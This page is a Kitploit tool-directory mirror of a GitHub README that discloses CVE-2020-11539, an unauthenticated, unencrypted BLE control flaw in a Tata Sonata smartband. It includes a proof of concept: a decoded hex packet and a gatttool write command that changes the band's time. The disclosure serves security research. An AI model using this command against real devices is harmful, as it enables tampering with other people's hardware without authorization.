Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-11539 — Improper Access Control in Tata Sonata Smartband | Kitploit
Tools/GitHubGitHub/the-girl-who-lived/cve-2020-11539
Bluetooth SecurityIoT SecurityVulnerability AnalysisExploitationWireless SecurityHardware & IoT Security
GitHubthe-girl-who-lived/cve-2020-11539

CVE-2020-11539

Improper Access Control in Tata Sonata Smartband

View Repository
11156 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-11539: Improper Access Control in Tata Sonata Smartband

Information

Description: It has been identified that the smart band has no pairing (mode 0 BLE security level) The data being transmitted over the air is not encrypted. Adding to this, the data being sent to the smart band doesn't have any authentication or signature verification makes any attacker to control the parameter of the smart device.

Versions Affected: Smart SF Rush - 1.12

Researcher: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

Proof-of-Concept Exploit

Description

The following packet is reversed and found to be for changing the time, more packets can be reversed by extracting hcisnoop dump from your phone.

  1. Data value: 00870e00141401060712052b051e

    Data Hexdump:00870e00141401060712052b051e
    Data Decimal:00135140020200106071805430530
  • 00 87: Header of the packet

  • 0e 00: Type of the pacekt

  • 14 14: Year in hex (2020)

  • 01 06: Month and Day ( Jan 6th)

  • 07 12: Hour and Minute in hex ( 07:18AM)

  • 05 : Seconds

  1. Send following Gatttool command for controlling the time of the smartband:

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

Proof of Concept Video:

Download Tool